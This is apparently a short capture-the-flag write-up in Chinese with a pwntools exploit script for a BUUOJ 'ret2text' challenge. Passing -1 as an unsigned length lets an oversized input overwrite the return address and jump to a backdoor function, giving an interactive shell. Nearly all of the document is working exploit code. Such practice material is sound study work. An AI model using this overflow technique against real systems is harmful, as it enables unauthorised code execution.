exp

简单的ret2text 注意unsignint为-1时可以视为无穷

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    arch ='amd64',
    #arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')
#io = process('./pwn')
#libc = ELF("")
io = remote("node4.buuoj.cn",26003)
def debug():
    gdb.attach(io,'b *0x4007c0')
    pause()
#code here
#debug()
backdoor_addr = 0x4006E6
offset = 16
payload = cyclic(offset)+p64(0x0)+p64(backdoor_addr)
io.sendlineafter('Please input the length of your name:','-1')
io.sendline(payload)
io.interactive()